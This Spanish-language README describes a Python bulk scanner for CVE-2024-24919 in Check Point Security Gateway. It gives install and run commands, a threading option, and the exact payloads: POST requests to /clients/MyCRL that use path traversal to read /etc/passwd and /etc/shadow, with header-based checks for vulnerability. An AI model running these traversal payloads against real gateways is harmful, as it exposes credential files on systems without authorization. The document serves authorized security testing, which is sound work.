
CVE-2024-24919 [Divulgación de Información de Check Point Security Gateway]
CVE-2024-24919 [Divulgación de Información de Check Point Security Gateway]
Script basado en y el crédito va para: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
Este script de Python escanea una lista de URLs en busca de la vulnerabilidad CVE-2024-24919 enviando solicitudes POST específicas y verificando los encabezados de respuesta y el código de estado. Registra los detalles de solicitud y respuesta e identifica URLs vulnerables según criterios predefinidos.

[!WARNING] Destinado únicamente para fines educativos y pruebas en entornos corporativos. https://x.com/__nav1n_/ https://github.com/ifconfig-me no asume ninguna responsabilidad por el código, úselo bajo su propio riesgo. No ataque un objetivo sin tener permiso para interactuar con él.
[!NOTE] Hilos (Threading): La nueva versión v2 ahora puede funcionar con hilos. El script crea 50 hilos para procesar URLs simultáneamente y acelerar el escaneo, y este número de hilos se puede controlar con
-t 100. Cola (Queue): Se utiliza una cola para gestionar las URLs y distribuirlas entre los hilos trabajadores. Progreso y Resultados: El script imprime el progreso y los resultados usando salida coloreada.
requeststermcolorClonar el repositorio:
git clone https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner.git
cd CVE-2024-24919-Bulk-Scanner
Instalar las bibliotecas necesarias:
pip install requests termcolor
Preparar un archivo con la lista de URLs:
Cree un archivo de texto (por ejemplo, urls.txt) con una URL por línea. Asegúrese de que cada URL comience con https://. Ejemplo:
https://example.com
https://testsite.com
https://vulnerable.com
https://123.456.789.10:8080
Ejecutar el script:
python CVE-2024-24919-auto-v2.py -t 150 -f urls.txt
Verificar la salida:
El script imprimirá el progreso del escaneo y los resultados en la terminal. Las URLs vulnerables se identificarán con el mensaje Vulnerable URL found:.
Resultados:
request-analyze.txt y request-analyze-v2.txt en la versión v2.checkpoint-results.txt y checkpoint-results-v2.txt en la versión v2.El script envía solicitudes POST al endpoint /clients/MyCRL de cada URL con dos payloads:
aCSHELL/../../../../../../../etc/passwdaCSHELL/../../../../../../../etc/shadowVerifica los encabezados de respuesta según los siguientes criterios:
Server: Check Point SVN foundationX-UA-Compatible: IE=EmulateIE7X-Frame-Options: SAMEORIGINHTTP/1.0 200 OKSi la respuesta coincide con al menos tres de los criterios anteriores, la URL se considera vulnerable.
